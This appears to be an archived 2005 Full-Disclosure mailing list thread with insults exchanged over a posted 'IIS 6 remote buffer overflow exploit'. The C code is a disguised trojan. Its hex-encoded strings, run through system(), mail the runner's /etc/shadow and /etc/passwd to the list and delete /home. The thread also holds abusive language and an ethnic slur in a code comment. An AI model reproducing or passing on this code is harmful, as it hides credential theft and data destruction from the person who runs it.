| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050420215757.36486.qmail@web60901.mail.yahoo.com>
Date: Wed Apr 20 22:58:03 2005
From: d4yj4y at yahoo.com (Day Jay)
Subject: FIXED CODE - IIS 6 Remote Buffer Overflow
Exploit(was broken)
Yes it is you hat squad lammer newbie. Now get it to
work!! You fucking newbie.
You're so lame and so is your file system.
--- "class101@...-SQUAD.com" <class101@...-squad.com>
wrote:
> perfect asshole
>
>
-------------------------------------------------------------
> class101
> Jr. Researcher
> Hat-Squad.com
>
-------------------------------------------------------------
> ----- Original Message -----
> From: "Day Jay" <d4yj4y@...oo.com>
> To: <full-disclosure@...ts.grok.org.uk>
> Sent: Wednesday, April 20, 2005 8:15 PM
> Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote
> Buffer Overflow
> Exploit(was broken)
>
>
> > Sorry, the previous code was broken. This code
> should
> > work...
> >
> > Happy Owning!! :)
> >
> >
> > =========SNIP============
> > /* Proof of concept code
> > Please don't send us e-mails
> > asking us "how to hack" because
> > we will be forced to skullfsck you.
> >
> > DISCLAIMER:
> > !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
> >
> > IIS 6 Buffer Overflow Exploit
> >
> > BUG: inetinfo.exe improperly bound checks
> > http requests sent longer than 6998 chars.
> > Can get messy but enough testing, and we have
> > found a way in.
> >
> > VENDOR STATUS: Notified
> > FIX: In process
> >
> > Remote root.
> >
> > eg.
> > #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> > + Connecting to host...
> > + Connected.
> > + Inserting Shellcode...
> > + Done...
> > + Spawining shell..
> >
> > Microsoft Windows XP [Version 5.1.2600]
> > (C) Copyright 1985-2001 Microsoft Corp.
> > C:\
> >
> >
> >
> > */
> > char shellcode[] =
> > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> > "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> > "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> > "\x68\x65\x68\x65";
> >
> > char launcher [] =
> > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> > "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> >
> > char netcat_shell [] =
> > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> > "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> >
> >
> > main()
> > {
> >
> > file://Section Initialises designs implemented by
> mexicans
> > file://Imigrate
> > system(launcher);
> > system(netcat_shell);
> > system(shellcode);
> >
> > file://int socket = 0;
> > file://double long port = 0.0;
> >
> > file://#DEFINE port host address
> > file://#DEFINE number of inters
> > file://#DEFINE gull eeuEE
> >
> > // for(int j; j < 30; j++)
> > {
> > file://Find socket remote address fault
> > printf(".");
> > }
> > file://overtake inetinfo here IIS_666666^
> > return 0;
> > }
> >
> > __________________________________________________
> > Do You Yahoo!?
> > Tired of spam? Yahoo! Mail has the best spam
> protection around
> > http://mail.yahoo.com
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia -
> http://secunia.com/
>
>
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
Powered by blists - more mailing lists